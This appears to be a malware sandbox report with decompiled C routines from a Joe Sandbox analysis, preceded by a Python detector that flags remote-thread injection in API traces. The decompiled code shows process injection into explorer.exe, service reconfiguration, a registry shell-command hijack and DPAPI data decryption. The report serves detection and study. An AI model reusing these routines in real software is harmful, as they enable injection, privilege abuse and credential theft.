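• VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 02D17A3A
• VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 02D17A5B
• VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 02D17A73
• WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 02D17A9D
• WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D17AC5
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D17ADD
"""
TRACE_E02D21FD8 = """\
• OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,745D0770,00000000), ref: 02D21FEC
• VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 02D2203F
• WriteProcessMemory.KERNEL32(00000000,00000000,02D29158,00000800,00000000), ref: 02D22057
• VirtualProtectEx.KERNEL32(02D21FD3,00000000,00000800,00000040,?), ref: 02D22068
• VirtualAllocEx.KERNEL32(02D21FD3,00000000,00000103,00003000,00000004), ref: 02D2207F
• WriteProcessMemory.KERNEL32(02D21FD3,00000000,?,00000103,00000000), ref: 02D22095
• CreateRemoteThread.KERNEL32(02D21FD3,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 02D220A8
"""

# "• [Part of subcall function XXXX: ]Api.Module(args), ref: ADDR"; the parenthesised
# argument list is optional because calls without parameters are printed without it.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)"
)

# Win32 constants (values from the SDK headers).
PROCESS_ALL_ACCESS = 0x1FFFFF
PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_WRITE = 0x2, 0x8, 0x20
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
MEM_COMMIT = 0x1000
EXEC_PAGE_MASK = 0x10 | 0x20 | 0x40 | 0x80   # any PAGE_EXECUTE* protection
OFFSET_CUTOFF = 0x1000                        # assumption: a start address below this is an offset, not a base


@dataclass
class Call:
    api: str
    args: List[Optional[int]]   # None where the sandbox printed '?' or a string literal
    ref: int
    subcall: bool               # "Part of subcall function": made by a helper, not this routine


def parse_trace(text: str) -> List[Call]:
    """Turn the report's bullet lines into Call records; non-matching lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if not m:
            continue
        api, _module, argstr, ref = m.groups()
        args = [int(t, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", t.strip()) else None
                for t in argstr.split(",")] if argstr else []
        calls.append(Call(api, args, int(ref, 16), "Part of subcall" in line))
    return calls


def hx(v: Optional[int]) -> str:
    return "?" if v is None else f"{v:#x}"


def analyze(calls: List[Call]) -> dict:
    """Walk one routine's calls in order and report the remote-thread injection primitives."""
    have_rights = have_exec = have_write = injected = False
    findings, fixed = [], []
    for c in calls:
        if c.subcall:
            continue
        a = c.args
        if c.api == "OpenProcess" and a:
            if a[0] == PROCESS_ALL_ACCESS:
                findings.append(f"{c.ref:08X} OpenProcess with PROCESS_ALL_ACCESS")
            if a[0] is not None and (a[0] & INJECT_RIGHTS) == INJECT_RIGHTS:
                have_rights = True          # CREATE_THREAD | VM_OPERATION | VM_WRITE is enough to inject
        elif c.api == "VirtualAllocEx" and len(a) >= 5:
            addr, size, atype, prot = a[1], a[2], a[3], a[4]
            if atype and atype & MEM_COMMIT and prot and prot & EXEC_PAGE_MASK:
                have_exec = True
                findings.append(f"{c.ref:08X} VirtualAllocEx {hx(size)} bytes executable (flProtect={hx(prot)})")
            if addr:                        # lpAddress != NULL: caller picked the address
                fixed.append(addr)
                findings.append(f"{c.ref:08X} VirtualAllocEx at caller-chosen address {addr:#010x}")
        elif c.api == "VirtualProtectEx" and len(a) >= 4 and a[3] and a[3] & EXEC_PAGE_MASK:
            have_exec = True
        elif c.api == "WriteProcessMemory":
            have_write = True
        elif c.api == "CreateRemoteThread":
            if have_rights and have_exec and have_write:
                injected = True
                findings.append(f"{c.ref:08X} CreateRemoteThread after writes into an executable region: remote-thread injection")
            start = a[3] if len(a) > 3 else None
            if start and start < OFFSET_CUTOFF:
                findings.append(f"{c.ref:08X} lpStartAddress {start:#x} is an offset into the injected blob, not a region base")
    return {"injection": injected, "fixed_addresses": fixed, "findings": findings}


if __name__ == "__main__":
    for name, trace in (("E02D179E8", TRACE_E02D179E8), ("E02D21FD8", TRACE_E02D21FD8)):
        result = analyze(parse_trace(trace))
        print(name, "injection" if result["injection"] else "no chain")
        for f in result["findings"]:
            print("  ", f)
```

Both listings come out as injection chains; the first additionally reports the caller-chosen address 0x33370000, the second the 0x10e entry offset. A trace that only opens a process with PROCESS_QUERY_INFORMATION and never allocates or writes produces no chain, which is the check that keeps the rule from firing on ordinary process inspection.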

                                                                    C-Code - Quality: 100%
                                                                    			E02D1D49C(short** _a4, int _a8) {
                                                                    				void* _t3;
                                                                    				short* _t9;
                                                                    				void* _t12;
                                                                    				short* _t14;
                                                                    				void* _t16;
                                                                    
                                                                    				_t14 = 0;
                                                                    				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
                                                                    				_t16 = _t3;
                                                                    				if(_t16 != 0) {
                                                                    					_t12 = OpenServiceW(_t16,  *_a4, 2);
                                                                    					if(_t12 != 0) {
                                                                    						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
                                                                    							_t14 = 1;
                                                                    						}
                                                                    						CloseServiceHandle(_t16);
                                                                    						CloseServiceHandle(_t12);
                                                                    						_t9 = _t14;
                                                                    					} else {
                                                                    						CloseServiceHandle(_t16);
                                                                    						_t9 = 0;
                                                                    					}
                                                                    					return _t9;
                                                                    				}
                                                                    				return _t3;
                                                                    			}

                                                                    Statement addresses (address column of the C-Code view): 0x02d1d4a8 0x02d1d4ab 0x02d1d4b1 0x02d1d4b5 0x02d1d4c6 0x02d1d4ca 0x02d1d4ee 0x02d1d4f2 0x02d1d4f2 0x02d1d4fa 0x02d1d4fd 0x02d1d4ff 0x02d1d4cc 0x02d1d4cd 0x02d1d4d3 0x02d1d4d3 0x00000000 0x02d1d501 0x02d1d505

                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 02D1D4AB
                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 02D1D4C0
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D4CD
                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D1D4E6
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D4FA
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D4FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                    • String ID: ServicesActive
                                                                    • API String ID: 493672254-3071072050
                                                                    • Opcode ID: 5596b01e817647dbbcc19b3d85fe7ef16f422977c03762091eeb21341a76a261
                                                                    • Instruction ID: 1f247165dfbfc2a5094d5bc61033fb7f73ce065258571b2a323605008a80d541
                                                                    • Opcode Fuzzy Hash: 5596b01e817647dbbcc19b3d85fe7ef16f422977c03762091eeb21341a76a261
                                                                    • Instruction Fuzzy Hash: 8EF0F63264022577D6301A6AAD8AE5B3F5DEBD67707110621FE16D2380CB60CC54C6A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D218BA() {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				struct _SECURITY_DESCRIPTOR* _v20;
                                                                    				struct _SECURITY_ATTRIBUTES _v24;
                                                                    				struct _SECURITY_DESCRIPTOR _v44;
                                                                    				long _t20;
                                                                    
                                                                    				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
                                                                    					L5:
                                                                    					return 0;
                                                                    				} else {
                                                                    					_v24 = 0xc;
                                                                    					_v20 =  &_v44;
                                                                    					_v16 = 0;
                                                                    					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
                                                                    					if(_t20 != 0) {
                                                                    						SetLastError(_t20);
                                                                    						goto L5;
                                                                    					}
                                                                    					RegCloseKey(_v8);
                                                                    					return 1;
                                                                    				}
                                                                    			}

                                                                    Statement addresses (address column of the C-Code view): 0x02d218cf 0x02d21931 0x00000000 0x02d218e5 0x02d218e8 0x02d218ef 0x02d218f9 0x02d21913 0x02d2191b 0x02d2192b 0x00000000 0x02d2192b 0x02d21920 0x00000000 0x02d21926

                                                                    APIs
                                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,02D21B06), ref: 02D218C7
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,02D21B06), ref: 02D218DB
                                                                    • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,02D21B06,?), ref: 02D21913
                                                                    • RegCloseKey.ADVAPI32(02D21B06), ref: 02D21920
                                                                    • SetLastError.KERNEL32(00000000), ref: 02D2192B
                                                                    Strings
                                                                    • Software\Classes\Folder\shell\open\command, xrefs: 02D21909
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                                                    • String ID: Software\Classes\Folder\shell\open\command
                                                                    • API String ID: 1473660444-2536721355
                                                                    • Opcode ID: dad83b4c61805b57d9c057c9c497ea8930076fa1d8bff10d936efe681e88da82
                                                                    • Instruction ID: 0fb29370bbf5483f38b52ff3b7b486c822d603c755658f834419e5d036ea3eef
                                                                    • Opcode Fuzzy Hash: dad83b4c61805b57d9c057c9c497ea8930076fa1d8bff10d936efe681e88da82
                                                                    • Instruction Fuzzy Hash: 3C010871D41228AADB209BA2AD49EDF7FBCEF19655F114521F906F2240E770CA48CAA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,02D1CA5F,?), ref: 02D1CCD1
                                                                    • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,02D1CA5F,?), ref: 02D1CCEA
                                                                    • BCryptGenerateSymmetricKey.BCRYPT(00000020,02D1CA5F,00000000,00000000,?,00000020,00000000,?,02D1CA5F,?), ref: 02D1CCFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                                                    • String ID: AES$ChainingMode$ChainingModeGCM
                                                                    • API String ID: 1692524283-1213888626
                                                                    • Opcode ID: 55f2feab087df252567dfd6847cb55f0f9993f4aa056a057a703b4e438371a7b
                                                                    • Instruction ID: 72c8a7ad969155f41f8f86b1f1b9c574c6c6edd3c560be60b0900334e0d714f0
                                                                    • Opcode Fuzzy Hash: 55f2feab087df252567dfd6847cb55f0f9993f4aa056a057a703b4e438371a7b
                                                                    • Instruction Fuzzy Hash: E8F0C231681321BBEB240B5AFC09E9BBFACEF2AAA4B100026F505D2250D7A15C1487E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 17050ba68c81e900161b8c06f5f4cdd3d0c630bdc4224e70a546b82872d3972e
                                                                    • Instruction ID: 49de30e82319f99e9f18cd666cded436137e256d470217a3937134d7d394c329
                                                                    • Opcode Fuzzy Hash: 17050ba68c81e900161b8c06f5f4cdd3d0c630bdc4224e70a546b82872d3972e
                                                                    • Instruction Fuzzy Hash: 9BC22971E046288BDB25CE28DD407EAB7B5EB48305F1441EBD84DE7240E778AEC58F89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 74%
                                                                    			E02D1CF58(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				char _v10;
                                                                    				char _v12;
                                                                    				long _v16;
                                                                    				void* _v20;
                                                                    				intOrPtr _v60;
                                                                    				intOrPtr _v64;
                                                                    				intOrPtr _v76;
                                                                    				intOrPtr _v80;
                                                                    				intOrPtr _v84;
                                                                    				int _v88;
                                                                    				void* _t36;
                                                                    				long _t50;
                                                                    				void* _t54;
                                                                    				int _t61;
                                                                    				void* _t63;
                                                                    				void* _t73;
                                                                    				void* _t74;
                                                                    				void* _t75;
                                                                    				void* _t76;
                                                                    				void* _t77;
                                                                    
                                                                    				_t63 = __ecx;
                                                                    				_t73 = __edx;
                                                                    				_v12 = 0x3176;
                                                                    				_v10 = 0x30;
                                                                    				_t75 = __ecx;
                                                                    				if(__edx < 3) {
                                                                    					L8:
                                                                    					_push(_t63);
                                                                    					_push( &_v16);
                                                                    					_push( &_v20);
                                                                    					_t36 = E02D1CA78(_t75, _t73, __eflags);
                                                                    					__eflags = _t36;
                                                                    					if(_t36 != 0) {
                                                                    						_t76 = E02D11085(_v16 + 1);
                                                                    						__eflags = _v16 + 1;
                                                                    						E02D11052(_t76, 0, _v16 + 1);
                                                                    						E02D1102C(_t76, _v20, _v16);
                                                                    						LocalFree(_v20);
                                                                    						goto L10;
                                                                    					}
                                                                    				} else {
                                                                    					_t36 = E02D11000(__ecx,  &_v12, 3);
                                                                    					_t77 = _t77 + 0xc;
                                                                    					if(_t36 != 0) {
                                                                    						goto L8;
                                                                    					} else {
                                                                    						if(_a4 != _t36 && _a8 != _t36) {
                                                                    							_t61 = 0x40;
                                                                    							E02D11052( &_v88, _t36, _t61);
                                                                    							_t7 = _t75 + 3; // 0x3
                                                                    							_v88 = _t61;
                                                                    							_v80 = _t7;
                                                                    							_t10 = _t73 - 0x10; // -16
                                                                    							_v84 = 1;
                                                                    							_v76 = 0xc;
                                                                    							_v64 = _t10 + _t75;
                                                                    							_t14 = _t73 - 0x1f; // -31
                                                                    							_t50 = _t14;
                                                                    							_v60 = 0x10;
                                                                    							_v16 = _t50;
                                                                    							_t36 = LocalAlloc(_t61, _t50);
                                                                    							_t74 = _t36;
                                                                    							if(_t74 != 0) {
                                                                    								_t54 = _v80 + _v76;
                                                                    								__imp__BCryptDecrypt(_a8, _t54, _v16,  &_v88, 0, 0, _t74, _v16,  &_v16, 0);
                                                                    								if(_t54 != 0) {
                                                                    									return 0x2d26056;
                                                                    								}
                                                                    								_t76 = E02D11085(_v16 + 1);
                                                                    								E02D11052(_t76, 0, _v16 + 1);
                                                                    								E02D1102C(_t76, _t74, _v16);
                                                                    								LocalFree(_t74);
                                                                    								L10:
                                                                    								return _t76;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t36;
                                                                    			}

                                                                    Statement addresses (address column of the C-Code view): 0x02d1cf58 0x02d1cf61 0x02d1cf63 0x02d1cf69 0x02d1cf6d 0x02d1cf72 0x02d1d04b 0x02d1d04b 0x02d1d051 0x02d1d057 0x02d1d05b 0x02d1d063 0x02d1d065 0x02d1d075 0x02d1d077 0x02d1d07c 0x02d1d08b 0x02d1d096 0x00000000 0x02d1d096 0x02d1cf78 0x02d1cf7f 0x02d1cf84 0x02d1cf89 0x00000000 0x02d1cf8f 0x02d1cf92 0x02d1cfa3 0x02d1cfaa 0x02d1cfaf 0x02d1cfb2 0x02d1cfb5 0x02d1cfbb 0x02d1cfbe 0x02d1cfc7 0x02d1cfce 0x02d1cfd1 0x02d1cfd1 0x02d1cfd6 0x02d1cfdd 0x02d1cfe0 0x02d1cfe6 0x02d1cfea 0x02d1d007 0x02d1d00e 0x02d1d016 0x00000000 0x02d1d044 0x02d1d026 0x02d1d02c 0x02d1d039 0x02d1d096 0x02d1d096 0x00000000 0x02d1d09c 0x02d1cfea 0x02d1cf92 0x02d1cf89 0x02d1d0a2

                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 02D1CFE0
                                                                    • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 02D1D00E
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • LocalFree.KERNEL32(?), ref: 02D1D096
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                                                    • String ID: 0$v1
                                                                    • API String ID: 4131498132-3331332043
                                                                    • Opcode ID: e88e0ba3970b02d67f556b461b94463bbbc8857a56f2d7a01a785b378c5e8a08
                                                                    • Instruction ID: 2147399117abd6ea92a446150b193c6a82e453646696a952c199e35f52d50eeb
                                                                    • Opcode Fuzzy Hash: e88e0ba3970b02d67f556b461b94463bbbc8857a56f2d7a01a785b378c5e8a08
                                                                    • Instruction Fuzzy Hash: D8414FB2D00118BBDB159BE5EC44EAEBBBEEF44344F144026E915E6340E7759E09CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D220B8(void* __ecx, void* __eflags) {
                                                                    				char _v264;
                                                                    				intOrPtr _v292;
                                                                    				void* _v300;
                                                                    				int _t11;
                                                                    				void* _t22;
                                                                    
                                                                    				_t22 = CreateToolhelp32Snapshot(2, 0);
                                                                    				E02D11052( &_v300, 0, 0x128);
                                                                    				_v300 = 0x128;
                                                                    				_t11 = Process32First(_t22,  &_v300);
                                                                    				while(_t11 != 0) {
                                                                    					if(E02D11144( &_v264, "explorer.exe") == 0) {
                                                                    						return _v292;
                                                                    					}
                                                                    					_t11 = Process32Next(_t22,  &_v300);
                                                                    				}
                                                                    				CloseHandle(_t22);
                                                                    				return 0;
                                                                    			}

                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D220C7
                                                                    • Process32First.KERNEL32(00000000,?), ref: 02D220F4
                                                                    • Process32Next.KERNEL32 ref: 02D2211B
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D22126
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                    • String ID: explorer.exe
                                                                    • API String ID: 420147892-3187896405
                                                                    • Opcode ID: 08cb5d6e981a7abc8371e9f733253ae5527597428ec71c816ddaa71cff057027
                                                                    • Instruction ID: bb88271a4a18498de59111baf34231d7835bab446dc9644b3ccaceda59b32582
                                                                    • Opcode Fuzzy Hash: 08cb5d6e981a7abc8371e9f733253ae5527597428ec71c816ddaa71cff057027
                                                                    • Instruction Fuzzy Hash: 3601D671941134ABE7319660AC09FDA77FCDF64714F0100A0FE45E1280EF30DE98CA64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c:A$c:A
                                                                    • API String ID: 0-2800959067
                                                                    • Opcode ID: e4da9a3ece603e5253f13d06d2bf8e39c6af38c700a65b5cea5a23b816b3bc5a
                                                                    • Instruction ID: 2fe37773bd22612b91168216a29c41222d0753e8c452c883c51a6ff0870718b2
                                                                    • Opcode Fuzzy Hash: e4da9a3ece603e5253f13d06d2bf8e39c6af38c700a65b5cea5a23b816b3bc5a
                                                                    • Instruction Fuzzy Hash: 76023971E002199FDF14CFA9C9806EEB7F1FF88314F25826AD829E7380D775A9518B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 24%
                                                                    			E02D1A632(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v16;
                                                                    				intOrPtr _v20;
                                                                    				char _v24;
                                                                    				char _v8216;
                                                                    				char* _t24;
                                                                    				signed int _t27;
                                                                    				WCHAR* _t29;
                                                                    				intOrPtr _t30;
                                                                    				signed int* _t31;
                                                                    				intOrPtr _t32;
                                                                    				void* _t34;
                                                                    				intOrPtr _t35;
                                                                    				intOrPtr _t36;
                                                                    				void* _t38;
                                                                    				void* _t39;
                                                                    
                                                                    				_t30 = __ecx;
                                                                    				E02D11190(0x2014, __ecx);
                                                                    				_t36 = _a4;
                                                                    				_t29 = __edx;
                                                                    				_v8 = _t30;
                                                                    				_t3 = _t36 - 1; // -1
                                                                    				_t34 = GlobalAlloc(0x40, _t3);
                                                                    				_t38 = 1;
                                                                    				if(_t36 > 1) {
                                                                    					_t32 = _v8;
                                                                    					do {
                                                                    						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
                                                                    						_t38 = _t38 + 1;
                                                                    					} while (_t38 < _t36);
                                                                    				}
                                                                    				_t8 = _t36 - 1; // -1
                                                                    				_v12 = _t34;
                                                                    				_v16 = _t8;
                                                                    				_t39 = 0;
                                                                    				_t24 =  &_v16;
                                                                    				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
                                                                    				if(_t24 == 0) {
                                                                    					_push(L"Could not decrypt");
                                                                    				} else {
                                                                    					if(_t36 > 0) {
                                                                    						_t35 = _v20;
                                                                    						_t31 =  &_v8216;
                                                                    						do {
                                                                    							_t27 =  *(_t35 + _t39) & 0x000000ff;
                                                                    							_t39 = _t39 + 2;
                                                                    							 *_t31 = _t27;
                                                                    							_t31 =  &(_t31[0]);
                                                                    						} while (_t39 < _t36);
                                                                    					}
                                                                    					_push( &_v8216);
                                                                    				}
                                                                    				return lstrcpyW(_t29, ??);
                                                                    			}

                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,-00000001,745CE730,?,?,?,02D1A5E6,00001000,?,00000000,00001000), ref: 02D1A650
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02D1A5E6), ref: 02D1A686
                                                                    • lstrcpyW.KERNEL32 ref: 02D1A6BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                                                    • String ID: Could not decrypt
                                                                    • API String ID: 3112367126-1484008118
                                                                    • Opcode ID: f6714edca229872afa110b3b18dd54a3f3456612d63dd0265e9a4b51b924e2d9
